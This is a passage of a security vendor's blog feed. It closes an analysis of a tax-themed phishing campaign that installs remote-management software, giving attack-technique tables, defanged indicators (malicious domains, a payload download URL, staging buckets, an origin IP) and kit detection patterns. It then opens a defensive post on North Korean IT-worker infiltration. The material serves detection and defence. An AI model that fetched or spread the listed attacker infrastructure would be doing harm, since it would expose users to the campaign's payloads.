                    "
                    >
                                        59                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        July (to 29th)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        57                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        20                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D7"
                    data-col-index="3"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        87                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Total                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        240                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        82                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D8"
                    data-col-index="3"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        425                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-366'>
table#wpdtSimpleTable-366{ table-layout: fixed !important; }
table#wpdtSimpleTable-366 td, table.wpdtSimpleTable366 th { white-space: normal !important; }
</style>




<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="973" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/New-Kit-Hosts-First-Seen-per-Month-1024x973.png" alt="" class="wp-image-22860" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/New-Kit-Hosts-First-Seen-per-Month-1024x973.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/New-Kit-Hosts-First-Seen-per-Month-300x285.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/New-Kit-Hosts-First-Seen-per-Month-768x730.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/New-Kit-Hosts-First-Seen-per-Month-1536x1459.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/New-Kit-Hosts-First-Seen-per-Month-2048x1946.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/New-Kit-Hosts-First-Seen-per-Month-370x352.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/New-Kit-Hosts-First-Seen-per-Month-270x257.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/New-Kit-Hosts-First-Seen-per-Month-740x703.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">New kit hosts first seen per month. ANY.RUN</figcaption></figure>



<p class="wp-block-paragraph">The infrastructure also splits into two distinct URL patterns. All 83 Vercel and Netlify apps serve the kit directly from /img/font1.woff2, while 110 other hosts use per-recipient paths in the form /ftx/&lt;slug&gt;-&lt;epoch&gt;-&lt;hex&gt;/. </p>



<p class="wp-block-paragraph">The embedded Unix timestamps reveal the campaign’s operational tempo: the median link was first observed just 32 minutes after generation, and 77% within 24 hours. This strongly suggests that links are generated per recipient and used almost immediately. </p>



<p class="wp-block-paragraph">Reputation follows the same divide. Of 425 URLs, 23 were already rated malicious when observed, all hosted on cheap-TLD throwaway domains. None were Vercel apps, suggesting that the platform provides the clean domain reputation the operator’s own disposable domains lack. </p>



<h2 class="wp-block-heading">Conclusion </h2>



<p class="wp-block-paragraph">This analysis uncovered a 46-country, US-first campaign that abuses legitimate RMM software while rapidly rotating domains, lures, and remote-access products. The more durable detection opportunity lies in the delivery framework: recurring kit patterns and unsolicited RMM installation rather than individual IOCs or product names. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Respond faster and reduce risk in your company <br>
with <span class="highlight">deeper visibility</span> and <span class="highlight">intel</span> from 16K+ organizations
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=us-campaign-malware-analysi&#038;utm_term=250826&#038;utm_content=linktoenterprise" rel="noopener" target="_blank">
Strengthen Your SOC with ANY.RUN</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">Using <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Interactive Sandbox</a>, we exposed the full attack chain, from browser activity and redirects to scripts, processes, and network traffic. <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> then turned persistent indicators into pivots for uncovering related infrastructure and expanding the investigation across the wider campaign. </p>



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> provides interactive malware analysis and threat intelligence solutions to more than 16,000 organizations and 700,000 security professionals worldwide. </p>



<p class="wp-block-paragraph">Its <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> helps SOC teams, <a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">MSSPs</a>, and threat researchers investigate malware, suspicious files, and URLs in controlled virtual environments. Analysts can observe execution chains, inspect network activity, and uncover malicious behavior in real time to make faster, more confident decisions. </p>



<p class="wp-block-paragraph">ANY.RUN Threat Intelligence turns data from real-world investigations into actionable threat intelligence, helping security teams enrich alerts, uncover related infrastructure, investigate campaigns, and track evolving threats. </p>



<h2 class="wp-block-heading">TTPs </h2>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-367"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="12"
           data-wpID="367"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Tactic                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Technique (ID)                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Description                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Resource Development                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Acquire Infrastructure: Web Services (T1583.006)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        The operator used 82 one-shot*.vercel[.]appdeployments, one Netlify app, and*.github[.]io pages to host the lure kit.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Resource Development                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Acquire Infrastructure: Domains (T1583.001)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        The operator registered 32 throwaway domains on cheap TLDs and used 7 dynamic-DNS names to serve the same kit.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Resource Development                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Compromise Infrastructure (T1584)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        The operator used compromised legitimate websites — 8 confirmed in this arm, 117 conventional sites family-wide — to serve the icons8-microsoft-word-94.png kit path.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Initial Access                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Phishing: Spearphishing Link (T1566.002)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        The operator used a CRA/T4 spear-phishing email to link victims to a *.vercel[.]app lure page.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Execution                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        User Execution: Malicious File (T1204.002)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        The operator used an on-page access code to induce the victim to extract and run the single VBS script.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Execution                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Command and Scripting Interpreter: Visual Basic / PowerShell (T1059.005 / .001)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        The VBS script usedFileSystemObject to launch PowerShell and download the next stage.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Defense Evasion                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Obfuscated/Encrypted Files: password-protected archive (T1027)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        The kit used a password-protectedproject/*.ziprequiring the on-page access code to block automated extraction.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Defense Evasion                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Virtualization/SandboxEvasion (T1497)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        The operator used Telegram-based victim filtering, browser/IP/geo fingerprinting, and sleep timing to evade analysis environments.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Command and Control                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Ingress Tool Transfer (T1105)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        The operator used PowerShell to download the RMM MSI from rotating S3 / R2 / GitHub / gofile / raw-IP staging.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Command and Control                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Remote Access Software (T1219)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        The operator used a signed RMM agent to establish hands-on-keyboard remote access — GoTo Resolve and LogMeIn Rescue inthis arm, ScreenConnect and ConnectWise in sibling arms.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Command and Control                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Web Service (T1102)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C12"
                    data-col-index="2"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        The kit usedapi.telegram[.]orgto filter victims and conditionally deliver the payload.                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-367'>
table#wpdtSimpleTable-367{ table-layout: fixed !important; }
table#wpdtSimpleTable-367 td, table.wpdtSimpleTable367 th { white-space: normal !important; }
</style>




<h2 class="wp-block-heading">IOCs </h2>



<p class="wp-block-paragraph"><em>All indicators are defanged.</em> </p>



<p class="wp-block-paragraph"><strong>Kit handwriting (detection patterns):</strong> </p>



<p class="wp-block-paragraph">&#8211; */secure.html on host *.vercel[.]app  </p>



<p class="wp-block-paragraph">&#8211; */project/*.zip on host *.vercel[.]app </p>



<p class="wp-block-paragraph">&#8211; *img/font1.woff2 — the family-wide font pivot (425 URLs / 240 hosts) </p>



<p class="wp-block-paragraph">&#8211; Per-recipient path pattern /ftx/&lt;6-char slug&gt;-&lt;10-digit epoch&gt;-&lt;12-hex&gt;/ on non-platform hosts (289 URLs / 110 hosts); the epoch field dates the link’s generation </p>



<p class="wp-block-paragraph">&#8211; DOM: font-family:&#8217;fmtt&#8217; + img/font1.woff2 + alt=&#8217;PDF Icon&#8217; + “Access code is” text </p>



<p class="wp-block-paragraph"><strong>Lure deployments (representative; 82 Vercel apps observed in total):</strong> </p>



<p class="wp-block-paragraph">&#8211; fillingconfirmation[.]vercel[.]app </p>



<p class="wp-block-paragraph">&#8211; sharedconfirmationslip[.]vercel[.]app </p>



<p class="wp-block-paragraph">&#8211; officialsummarybycra[.]vercel[.]app </p>



<p class="wp-block-paragraph">&#8211; 2026t4form17718[.]vercel[.]app  </p>



<p class="wp-block-paragraph">&#8211; crataxsummary1007341[.]vercel[.]app </p>



<p class="wp-block-paragraph">&#8211; statemendetailsfilessenderderf[.]netlify[.]app </p>



<p class="wp-block-paragraph"><strong>Throwaway domains carrying a malicious verdict at observation:</strong> </p>



<p class="wp-block-paragraph">&#8211; quavix[.]vu  </p>



<p class="wp-block-paragraph">&#8211; cevora[.]vu  </p>



<p class="wp-block-paragraph">&#8211; xorlira[.]vu  </p>



<p class="wp-block-paragraph">&#8211; voretix[.]icu  </p>



<p class="wp-block-paragraph">&#8211; wurel[.]sbs </p>



<p class="wp-block-paragraph">&#8211; mornixa[.]cfd  </p>



<p class="wp-block-paragraph">&#8211; getdl[.]jorix[.]cyou </p>



<p class="wp-block-paragraph">&#8211; pdfmarchlitestatementsscannedforyou[.]gixar[.]sbs </p>



<p class="wp-block-paragraph">&#8211; reportstastementformarchreviewyourssaast[.]harnivo[.]cfd </p>



<p class="wp-block-paragraph"><strong>Dynamic-DNS kit hosts (attacker-controlled subdomains of legitimate DDNS providers — block the host, not the provider):</strong>  </p>



<p class="wp-block-paragraph">&#8211; 54511[.]ddnsking[.]com </p>



<p class="wp-block-paragraph">&#8211; dxy43[.]ddnsking[.]com </p>



<p class="wp-block-paragraph">&#8211; dyb32[.]ddnsking[.]com </p>



<p class="wp-block-paragraph">&#8211; 67pon[.]swoop2[.]me </p>



<p class="wp-block-paragraph">&#8211; dcsi23[.]swoop2[.]me </p>



<p class="wp-block-paragraph">&#8211; ssi11[.]letsgo2[.]me </p>



<p class="wp-block-paragraph">&#8211; ddn3[.]net2me[.]me </p>



<p class="wp-block-paragraph"><strong>Captured RMM MSI:</strong> &#8211; hxxps://commonerdays[.]vercel[.]app/LogMeInResolve_Unattended.msi </p>



<p class="wp-block-paragraph"><strong>Payload staging (attacker-controlled buckets):</strong> </p>



<p class="wp-block-paragraph">&#8211; mayteslaadvisorhq[.]s3[.]us-east-2[.]amazonaws[.]com </p>



<p class="wp-block-paragraph">&#8211; openfodervbs4view[.]ams3[.]cdn[.]digitaloceanspaces[.]com </p>



<p class="wp-block-paragraph"><strong>Durable origin IP:</strong>  </p>



<p class="wp-block-paragraph">&#8211; 46.62.197[.]232:7000 </p>



<p class="wp-block-paragraph"><strong>Compromised legitimate sites (kit path only):</strong> </p>



<p class="wp-block-paragraph">&#8211; hiltonheadislanddeals[.]com </p>



<p class="wp-block-paragraph">&#8211; gonzalezjaramilloabogados[.]com </p>



<p class="wp-block-paragraph">&#8211; mybcdc[.]ca  </p>



<p class="wp-block-paragraph">&#8211; taurusburgerco[.]com[.]au </p>



<p class="wp-block-paragraph">&#8211; ypatellawoffice[.]ca </p>



<p class="wp-block-paragraph">&#8211; electrical-sei[.]com </p>



<p class="wp-block-paragraph">&#8211; herculescalgarymovers[.]ca </p>



<p class="wp-block-paragraph">&#8211; quantechitsolutions[.]com </p>



<p class="wp-block-paragraph"><strong>Kit page content hashes (SHA256):</strong> </p>



<p class="wp-block-paragraph">&#8211; 41b731279b1778a9f578e4ed2589f46c4bef32793b292862cf96279a3ead1c41 (lure index page) </p>



<p class="wp-block-paragraph">&#8211; 132d864bb199105d639edb115249302243eafdb0fc21efb86cc6b6c0d49866f0 (secure.html gate page) </p>



<p class="wp-block-paragraph">&#8211; 51f0cc172ced2e90acbc01c2872c697644380e597076350a6b286c96ab7ccb42 (icons8-microsoft-word-94.png asset) </p>



<h2 class="wp-block-heading">Sources </h2>



<ul class="wp-block-list">
<li>Cloudflare Cloudforce One — <em>Vercel-hosted RMM abuse campaign evolves with Telegram C2 for victim filtering</em> — https://www.cloudflare.com/cloudforce-one/research/report/vercel-hosted-rmm-abuse-campaign-evolves-with-telegram-c2-for-victim-filtering/ </li>
</ul>



<ul class="wp-block-list">
<li>Kaseya / INKY — <em>The Vercel incident and the phishing campaigns already hiding in plain sight</em> — https://www.kaseya.com/blog/phishing-campaigns-abusing-vercels-free-hosting-platform/ </li>
</ul>



<ul class="wp-block-list">
<li>CyberArmor — <em>Cybercriminals Abusing Vercel to Deliver Remote Access Malware</em> — https://www.cyberarmor.tech/blog/threat-insight-cybercriminals-abusing-vercel-to-deliver-remote-access-malware </li>
</ul>



<ul class="wp-block-list">
<li>Red Canary — <em>The dual-use dilemma: Rethinking detection for remote access tool abuse</em> — https://redcanary.com/blog/security-operations/rmm-detection/ </li>
</ul>



<ul class="wp-block-list">
<li>Broadcom / Symantec — <em>RMM Abuse Continues: Malicious LogMeIn Resolve Activity on the Rise</em> — https://www.broadcom.com/support/security-center/protection-bulletin/rmm-abuse-continues-malicious-logmein-resolve-activity-on-the-rise </li>
</ul>



<ul class="wp-block-list">
<li>Canada Revenue Agency — <em>Recognize a scam</em> — https://www.canada.ca/en/revenue-agency/corporate/scams-fraud/recognize-scam.html </li>
</ul>
<p>The post <a href="https://any.run/cybersecurity-blog/us-campaign-malware-analysis/">A Single Canadian Tax Lure Spread into a 46-Country, US-First RMM Campaign</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/us-campaign-malware-analysis/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>North Korean IT Workers Scheme: Detection IOCs and Tactics for Government and Corporate SOCs</title>
		<link>https://any.run/cybersecurity-blog/how-to-protect-organization-against-north-korean-it-workers/</link>
					<comments>https://any.run/cybersecurity-blog/how-to-protect-organization-against-north-korean-it-workers/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Thu, 20 Aug 2026 07:58:36 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[cybersecurity training]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=22729</guid>

					<description><![CDATA[<p>The infiltration of North Korean IT workers into American and European organizations has evolved into a sophisticated operation that bypasses traditional security perimeters. By using forged identities and AI-assisted workflows, these operatives successfully transition from external applicants to trusted insiders. Recent investigations highlight that this scheme is no longer limited to the private sector, posing [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/how-to-protect-organization-against-north-korean-it-workers/">North Korean IT Workers Scheme: Detection IOCs and Tactics for Government and Corporate SOCs</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">The infiltration of North Korean IT workers into American and European organizations has evolved into a sophisticated <strong>operation that bypasses traditional security perimeters</strong>. By using forged identities and AI-assisted workflows, these operatives successfully transition from external applicants to trusted insiders.</p>



<p class="wp-block-paragraph">Recent investigations highlight that <strong>this scheme is no longer limited to the private sector, posing a direct threat to government agencies.</strong> </p>



<p class="wp-block-paragraph">Here’s how organizations can <strong>defend against this threat effectively</strong>.</p>



<h2 class="wp-block-heading">The Escalating Risk of the DPRK Remote Worker Threat</h2>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="1024" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/DPRK-Operatives-caught-1024x1024.png" alt="DPRK Operatives caught" class="wp-image-22474" style="width:668px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/DPRK-Operatives-caught-1024x1024.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/DPRK-Operatives-caught-300x300.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/DPRK-Operatives-caught-150x150.png 150w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/DPRK-Operatives-caught-768x769.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/DPRK-Operatives-caught-1534x1536.png 1534w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/DPRK-Operatives-caught-70x70.png 70w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/DPRK-Operatives-caught-370x370.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/DPRK-Operatives-caught-270x270.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/DPRK-Operatives-caught-740x741.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/DPRK-Operatives-caught.png 1636w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>DPRK Operatives caught by Bitso Quetzal Team while interviewing for a position at the Company</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The primary objective of the DPRK IT worker scheme <a href="https://any.run/cybersecurity-blog/lazarus-group-attacks-2025/" target="_blank" rel="noreferrer noopener">operated by the Lazarus APT</a> has historically been revenue generation, collectively earning hundreds of millions of dollars annually for the DPRK. However, the <strong>threat has escalated from financial fraud to a direct national security concern</strong> as these operatives penetrate the U.S. public sector.</p>



<p class="wp-block-paragraph">The <a href="https://federalnewsnetwork.com/technology-main/2026/08/fbi-investigating-north-korean-remote-it-staffer-working-for-u-s-agency/" target="_blank" rel="noreferrer noopener nofollow">FBI is currently investigating a recent case</a> where an unidentified U.S. federal agency <strong>unknowingly hired a North Korean remote IT worker</strong>. Last year, an individual who facilitated a North Korean national’s work on software development contracts for the Federal Aviation Administration (FAA) <strong>received a prison sentence</strong>. Such breaches grant unauthorized actors access to sensitive government systems and proprietary data.</p>



<p class="wp-block-paragraph">The full lifecycle, tools, and operational methods of these infiltrators were exposed in a comprehensive two-part joint investigation conducted by BCA LTD, NorthScan, and <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-to-identify-remote-workers&amp;utm_term=200826&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN</strong></a>. </p>



<ul class="wp-block-list">
<li><strong><a href="https://any.run/cybersecurity-blog/lazarus-group-it-workers-investigation/" target="_blank" rel="noreferrer noopener">In Part 1, researchers gained unprecedented access by posing as facilitators</a></strong>, deploying custom ANY.RUN sandbox environments disguised as developer laptops to record every click, command, and network connection executed by the operatives in real time. </li>



<li><strong><a href="https://any.run/cybersecurity-blog/lazarus-group-it-workers-investigation-part-two/" target="_blank" rel="noreferrer noopener">In Part 2, the team went a step further by establishing a simulated Web3 startup</a></strong>, tracking how Famous Chollima operatives collaborate, manage candidate pipelines, share infrastructure, and attempt to embed whole networks of &#8220;ghost developers&#8221; into target companies.</li>
</ul>



<h3 class="wp-block-heading">How DPRK IT worker scheme Operatives Hijack the Personnel Supply Chain</h3>



<p class="wp-block-paragraph">As demonstrated in the<a href="https://any.run/cybersecurity-blog/lazarus-group-it-workers-investigation-part-two/"> investigations</a>, threat actors combine stolen identities and artificial intelligence to infiltrate organizations. </p>



<figure class="wp-block-embed aligncenter is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<iframe loading="lazy" title="Lucas’ Interview" width="770" height="433" src="https://www.youtube.com/embed/dPAjfHr4kzk?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div><figcaption class="wp-element-caption"><em>An interview with a North Korean remote work for a position in a fake DeFi startup</em></figcaption></figure>



<p class="wp-block-paragraph"><a href="https://youtu.be/dPAjfHr4kzk" target="_blank" rel="noreferrer noopener"><strong>Watch the video on YouTube</strong></a> and<strong> <a href="https://any.run/cybersecurity-blog/lazarus-group-it-workers-investigation-part-two/" target="_blank" rel="noreferrer noopener">read the full investigation</a></strong></p>



<p class="wp-block-paragraph">Security experts describe this phenomenon as a <strong>critical risk within the personnel supply chain</strong>. While companies traditionally focus on defending against external attackers, the North Korean IT worker fraud flips this model by getting hired.</p>



<p class="wp-block-paragraph"><strong>A DPRK IT worker functions as a &#8220;Trojan horse,&#8221;</strong> obtaining legitimate credentials, access to internal networks, and corporate resources. This creates a unique insider threat:</p>



<ul class="wp-block-list">
<li><strong>Persistent Access to Critical Infrastructure:</strong> Unlike traditional cyberattacks that are brief and noisy, an employee is expected to remain in the system, allowing months or years of continuous access to source code and intellectual property.</li>



<li><strong>Malicious Influence on Decision-Making:</strong> Once embedded, operatives can influence critical engineering decisions, review code, and approve pull requests, potentially introducing intentional vulnerabilities.</li>



